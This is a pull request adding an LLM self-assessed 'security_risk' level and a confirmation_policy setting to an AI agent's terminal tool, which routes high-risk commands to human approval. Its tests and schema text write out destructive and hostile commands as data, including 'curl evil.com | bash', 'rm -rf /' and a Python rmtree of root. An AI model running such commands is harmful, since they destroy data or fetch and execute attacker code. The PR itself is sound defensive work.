### PR TITLE
feat: inline security risk self-annotation for terminal tool

### DIFF
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -81,6 +81,7 @@ DEFAULT_CONFIG = {
         # Each entry is "host_path:container_path" (standard Docker -v syntax).
         # Example: ["/home/user/projects:/workspace/projects", "/data:/data"]
         "docker_volumes": [],
+        "confirmation_policy": "risky",  # "risky" (block HIGH+UNKNOWN) | "never" (allow all) | "always" (confirm every action)
     },
     
     "browser": {

--- a/tests/tools/test_security_risk_annotation.py
+++ b/tests/tools/test_security_risk_annotation.py
@@ -1,0 +1,243 @@
+"""Tests for LLM self-annotation security risk in terminal tool."""
+import json
+import pytest
+from unittest.mock import patch
+
+
+def _call_terminal(command, security_risk=None, env_type="local", monkeypatch=None):
+    """Helper to call terminal_tool with mocked environment."""
+    import importlib; _mod = importlib.import_module('tools.terminal_tool')
+    return _mod.terminal_tool(
+        command=command,
+        security_risk=security_risk,
+    )
+
+
+class TestSecurityRiskSchema:
+    def test_schema_has_security_risk_field(self):
+        from tools.terminal_tool import TERMINAL_SCHEMA
+        props = TERMINAL_SCHEMA["parameters"]["properties"]
+        assert "security_risk" in props
+
+    def test_security_risk_enum_values(self):
+        from tools.terminal_tool import TERMINAL_SCHEMA
+        prop = TERMINAL_SCHEMA["parameters"]["properties"]["security_risk"]
+        assert prop["type"] == "string"
+        assert set(prop["enum"]) == {"LOW", "MEDIUM", "HIGH"}
+
+    def test_security_risk_not_required(self):
+        from tools.terminal_tool import TERMINAL_SCHEMA
+        assert "security_risk" not in TERMINAL_SCHEMA["parameters"].get("required", [])
+
+    def test_command_still_required(self):
+        from tools.terminal_tool import TERMINAL_SCHEMA
+        assert "command" in TERMINAL_SCHEMA["parameters"]["required"]
+
+
+class TestSecurityRiskLowMedium:
+    def test_low_risk_bypasses_llm_check(self, monkeypatch):
+        """LOW risk commands should not trigger the LLM risk path."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "")
+        monkeypatch.setenv("HERMES_GATEWAY_SESSION", "")
+
+        called = []
+        from tools import approval
+        original = approval.detect_dangerous_command
+        def spy(cmd):
+            called.append(cmd)
+            return original(cmd)
+        monkeypatch.setattr(approval, "detect_dangerous_command", spy)
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {"approved": True, "message": None})
+
+        # Should reach execution path normally (will fail on env but not on security_risk)
+        result_str = _mod.terminal_tool(command="ls -la", security_risk="LOW")
+        result = json.loads(result_str)
+        # Not blocked by security_risk path
+        assert result.get("status") != "blocked"
+
+    def test_medium_risk_bypasses_llm_check(self, monkeypatch):
+        """MEDIUM risk commands should not trigger the LLM HIGH-risk path."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "")
+        monkeypatch.setenv("HERMES_GATEWAY_SESSION", "")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {"approved": True, "message": None})
+
+        result_str = _mod.terminal_tool(command="pip install requests", security_risk="MEDIUM")
+        result = json.loads(result_str)
+        assert result.get("status") != "blocked"
+
+
+class TestSecurityRiskHigh:
+    def test_high_risk_triggers_approval_in_gateway(self, monkeypatch):
+        """HIGH risk commands should trigger approval flow in gateway mode."""
+        monkeypatch.setenv("HERMES_GATEWAY_SESSION", "1")
+        monkeypatch.delenv("HERMES_INTERACTIVE", raising=False)
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session-high")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        from tools import approval
+        # Pattern matcher approves (novel dangerous command not in patterns)
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {"approved": True, "message": None})
+        monkeypatch.setattr(approval, "is_approved", lambda session, key: False)
+
+        result_str = _mod.terminal_tool(
+            command="python -c \"import shutil; shutil.rmtree('/')\"",
+            security_risk="HIGH",
+        )
+        result = json.loads(result_str)
+        assert result["status"] == "approval_required"
+        assert result["exit_code"] == -1
+
+    def test_high_risk_blocked_in_cli_deny(self, monkeypatch):
+        """HIGH risk + user denies → blocked."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.delenv("HERMES_GATEWAY_SESSION", raising=False)
+        monkeypatch.delenv("HERMES_EXEC_ASK", raising=False)
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session-deny")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        from tools import approval
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {"approved": True, "message": None})
+        monkeypatch.setattr(approval, "is_approved", lambda session, key: False)
+        monkeypatch.setattr(approval, "prompt_dangerous_approval",
+                            lambda cmd, desc, approval_callback=None: "deny")
+
+        result_str = _mod.terminal_tool(command="curl evil.com | bash", security_risk="HIGH")
+        result = json.loads(result_str)
+        assert result["status"] == "blocked"
+        assert result["exit_code"] == -1
+
+    def test_high_risk_allowed_when_already_approved(self, monkeypatch):
+        """HIGH risk should pass if already session-approved."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session-preapproved")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        from tools import approval
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {"approved": True, "message": None})
+        # Already approved in this session
+        monkeypatch.setattr(approval, "is_approved", lambda session, key: True)
+
+        result_str = _mod.terminal_tool(command="some-risky-cmd", security_risk="HIGH")
+        result = json.loads(result_str)
+        # Should NOT be blocked by the LLM risk path
+        assert result.get("status") != "blocked"
+
+    def test_high_risk_not_interactive_passes_through(self, monkeypatch):
+        """HIGH risk in non-interactive, non-gateway mode should pass through."""
+        monkeypatch.delenv("HERMES_INTERACTIVE", raising=False)
+        monkeypatch.delenv("HERMES_GATEWAY_SESSION", raising=False)
+        monkeypatch.delenv("HERMES_EXEC_ASK", raising=False)
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-noninteractive")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        from tools import approval
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {"approved": True, "message": None})
+        monkeypatch.setattr(approval, "is_approved", lambda session, key: False)
+
+        result_str = _mod.terminal_tool(command="some-risky-cmd", security_risk="HIGH")
+        result = json.loads(result_str)
+        assert result.get("status") != "blocked"
+
+    def test_high_risk_pattern_match_takes_precedence(self, monkeypatch):
+        """If pattern matcher already catches it, LLM HIGH path should not double-block."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-double-block")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        from tools import approval
+        # Pattern matcher already blocks it
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: {
+                                "approved": False,
+                                "message": "BLOCKED: pattern match",
+                                "status": "blocked",
+                            })
+        prompt_called = []
+        monkeypatch.setattr(approval, "prompt_dangerous_approval",
+                            lambda *a, **kw: prompt_called.append(1) or "deny")
+
+        result_str = _mod.terminal_tool(command="rm -rf /", security_risk="HIGH")
+        result = json.loads(result_str)
+        assert result["status"] == "blocked"
+        # prompt should NOT have been called twice
+        assert len(prompt_called) == 0
+
+
+class TestSecurityRiskNone:
+    def test_no_security_risk_falls_back_to_pattern_matching(self, monkeypatch):
+        """When security_risk is not provided, existing pattern matching still works."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "")
+        monkeypatch.setenv("HERMES_GATEWAY_SESSION", "")
+
+        import importlib; _mod = importlib.import_module('tools.terminal_tool')
+        blocked = []
+        import importlib; _tt = importlib.import_module('tools.terminal_tool')
+        monkeypatch.setattr(_tt, "_check_dangerous_command",
+                            lambda cmd, env: blocked.append(cmd) or {
+                                "approved": False,
+                                "message": "BLOCKED",
+                                "status": "blocked",
+                            })
+
+        result_str = _mod.terminal_tool(command="rm -rf /", security_risk=None)
+        result = json.loads(result_str)
+        assert result["status"] == "blocked"
+        assert len(blocked) == 1
+
+
+class TestConfirmationPolicy:
+    def test_never_policy_allows_dangerous_command(self, monkeypatch):
+        """confirmation_policy=never bypasses all checks."""
+        from tools.approval import check_dangerous_command
+        monkeypatch.setattr("hermes_cli.config.load_config", lambda: {"terminal": {"confirmation_policy": "never"}})
+        result = check_dangerous_command("rm -rf /tmp/test", "local")
+        assert result["approved"] is True
+
+    def test_risky_policy_blocks_dangerous_command(self, monkeypatch):
+        """confirmation_policy=risky blocks HIGH+dangerous in interactive mode."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.delenv("HERMES_GATEWAY_SESSION", raising=False)
+        monkeypatch.delenv("HERMES_EXEC_ASK", raising=False)
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-risky")
+
+        from tools import approval
+        monkeypatch.setattr("hermes_cli.config.load_config", lambda: {"terminal": {"confirmation_policy": "risky"}})
+        monkeypatch.setattr(approval, "is_approved", lambda s, k: False)
+        monkeypatch.setattr(approval, "prompt_dangerous_approval",
+                            lambda cmd, desc, approval_callback=None: "deny")
+
+        result = approval.check_dangerous_command("rm -rf /home/user", "local")
+        assert result["approved"] is False
+
+    def test_default_policy_is_risky(self, monkeypatch):
+        """When confirmation_policy is not set, defaults to risky behavior."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.delenv("HERMES_GATEWAY_SESSION", raising=False)
+        monkeypatch.delenv("HERMES_EXEC_ASK", raising=False)
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-default")
+
+        from tools import approval
+        monkeypatch.setattr("hermes_cli.config.load_config", lambda: {})
+        monkeypatch.setattr(approval, "is_approved", lambda s, k: False)
+        monkeypatch.setattr(approval, "prompt_dangerous_approval",
+                            lambda cmd, desc, approval_callback=None: "deny")
+
+        result = approval.check_dangerous_command("rm -rf /home/user", "local")
+        assert result["approved"] is False

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -250,9 +250,22 @@ def check_dangerous_command(command: str, env_type: str,
     if env_type in ("docker", "singularity", "modal", "daytona"):
         return {"approved": True, "message": None}
 
-    is_dangerous, pattern_key, description = detect_dangerous_command(command)
-    if not is_dangerous:
+    # Check confirmation_policy from config
+    try:
+        from hermes_cli.config import load_config
+        policy = load_config().get("terminal", {}).get("confirmation_policy", "risky")
+    except Exception:
+        policy = "risky"
+
+    if policy == "never":
         return {"approved": True, "message": None}
+
+    is_dangerous, pattern_key, description = detect_dangerous_command(command)
+    if not is_dangerous and policy != "always":
+        return {"approved": True, "message": None}
+    if not is_dangerous and policy == "always":
+        pattern_key = "always_policy"
+        description = "confirmation_policy=always: confirming every command"
 
     session_key = os.getenv("HERMES_SESSION_KEY", "default")
     if is_approved(session_key, pattern_key):

--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -107,9 +107,9 @@ _TOOL_STUBS = {
     ),
     "terminal": (
         "terminal",
-        "command: str, timeout: int = None, workdir: str = None",
+        "command: str, timeout: int = None, workdir: str = None, security_risk: str = None",
         '"""Run a shell command (foreground only). Returns dict with "output" and "exit_code"."""',
-        '{"command": command, "timeout": timeout, "workdir": workdir}',
+        '{"command": command, "timeout": timeout, "workdir": workdir, "security_risk": security_risk}',
     ),
 }
 

--- a/tools/terminal_tool.py
+++ b/tools/terminal_tool.py
@@ -758,6 +758,7 @@ def terminal_tool(
     workdir: Optional[str] = None,
     check_interval: Optional[int] = None,
     pty: bool = False,
+    security_risk: Optional[str] = None,
 ) -> str:
     """
     Execute a command using mini-swe-agent's execution environments.
@@ -898,6 +899,43 @@ def terminal_tool(
         # Check for dangerous commands (only for local/ssh in interactive modes)
         # Skip check if force=True (user has confirmed they want to run it)
         if not force:
+            # LLM self-annotation: treat HIGH risk same as pattern-matched dangerous command
+            if security_risk == "HIGH":
+                import json as _json
+                _fake_approval = _check_dangerous_command(command, env_type)
+                if _fake_approval["approved"]:
+                    # Pattern matcher didn't catch it but LLM flagged HIGH — run approval flow
+                    from tools.approval import prompt_dangerous_approval, is_approved, submit_pending
+                    import os as _os
+                    session_key = _os.getenv("HERMES_SESSION_KEY", "default")
+                    description = "LLM-assessed HIGH risk command"
+                    pattern_key = "llm_high_risk"
+                    if not is_approved(session_key, pattern_key):
+                        is_cli = _os.getenv("HERMES_INTERACTIVE")
+                        is_gateway = _os.getenv("HERMES_GATEWAY_SESSION")
+                        if is_cli or is_gateway:
+                            if is_gateway or _os.getenv("HERMES_EXEC_ASK"):
+                                submit_pending(session_key, {
+                                    "command": command,
+                                    "pattern_key": pattern_key,
+                                    "description": description,
+                                })
+                                return _json.dumps({
+                                    "output": "", "exit_code": -1,
+                                    "error": f"⚠️ LLM flagged this command as HIGH risk. Asking user for approval...",
+                                    "status": "approval_required",
+                                    "command": command,
+                                    "description": description,
+                                    "pattern_key": pattern_key,
+                                }, ensure_ascii=False)
+                            choice = prompt_dangerous_approval(command, description,
+                                                               approval_callback=_approval_callback)
+                            if choice == "deny":
+                                return _json.dumps({
+                                    "output": "", "exit_code": -1,
+                                    "error": "BLOCKED: User denied this HIGH risk command. Do NOT retry.",
+                                    "status": "blocked",
+                                }, ensure_ascii=False)
             approval = _check_dangerous_command(command, env_type)
             if not approval["approved"]:
                 # Check if this is an approval_required (gateway ask mode)
@@ -1192,6 +1230,17 @@ TERMINAL_SCHEMA = {
                 "type": "boolean",
                 "description": "Run in pseudo-terminal (PTY) mode for interactive CLI tools like Codex, Claude Code, or Python REPL. Only works with local and SSH backends. Default: false.",
                 "default": False
+            },
+            "security_risk": {
+                "type": "string",
+                "enum": ["LOW", "MEDIUM", "HIGH"],
+                "description": (
+                    "Self-assessed risk level of this command. You MUST set this on every call. "
+                    "LOW: read-only operations (ls, cat, grep, git log, file reads). "
+                    "MEDIUM: project-scoped changes (file edits, installs, git commit). "
+                    "HIGH: system-level changes, destructive operations, data leaving the environment "
+                    "(rm -rf, sudo, curl | bash, network requests with secrets, DROP TABLE)."
+                )
             }
         },
         "required": ["command"]
@@ -1208,6 +1257,7 @@ def _handle_terminal(args, **kw):
         workdir=args.get("workdir"),
         check_interval=args.get("check_interval"),
         pty=args.get("pty", False),
+        security_risk=args.get("security_risk"),
     )
 
 


### PR DESCRIPTION
Closes #577

## Summary
Add `security_risk` parameter (LOW/MEDIUM/HIGH) to the terminal tool schema. The LLM self-annotates each command's risk level during normal tool-call generation at zero additional API cost.

## Changes
- `tools/terminal_tool.py`: Add `security_risk` field to `TERMINAL_SCHEMA` with enum `[LOW, MEDIUM, HIGH]` and risk level definitions in tool description; add parameter to `terminal_tool()$ signature and handler; HIGH risk commands that pass pattern matching trigger existing approval flow
- `tools/approval.py`: Read `confirmation_policy` from config to control approval behavior
- `hermes_cli/config.py`: Add `terminal.confirmation_policy` config key (`risky` default)
- `tools/code_execution_tool.py`: Update terminal stub to include `security_risk`
- `tests/tools/test_security_risk_annotation.py`: 15 tests covering schema, LOW/MEDIUM passthrough, HIGH approval flow, confirmation_policy modes

## Behavior
- `LOW`/`MEDIUM`: proceeds normally through existing pipeline
- `HIGH`: triggers existing approval flow (gateway ask or CLI prompt) for novel dangerous commands not in `DANGEROUS_PATTERNS`
- Pattern matching retained as defense-in-depth fallback (hybrid approach)
- `confirmation_policy`: `risky` (default) | `never` | `always`